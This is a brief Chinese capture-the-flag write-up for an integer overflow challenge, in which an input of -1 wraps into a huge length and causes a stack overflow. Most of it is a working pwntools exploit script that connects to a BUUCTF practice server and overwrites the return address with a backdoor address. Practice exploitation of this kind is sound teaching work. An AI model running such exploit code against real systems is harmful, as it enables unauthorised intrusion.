整数溢出漏洞
将nbytes设置为-1就会回绕,变成超大整数 从而实现栈溢出漏洞
环境有问题
from pwn import *# 连接到远程服务器
p = remote("node5.buuoj.cn", 28526)# 定义后门地址
backdoor = 0x400726# 发送初始输入
p.sendlineafter(b"your name:", b'-1')# 构造溢出载荷
# 0x10 是缓冲区大小,8 是返回地址的偏移量
payload = b'a' * (0x10 + 8) + p64(backdoor)# 发送溢出载荷
p.sendlineafter(b"u name?", payload)# 进入交互模式
p.interactive()
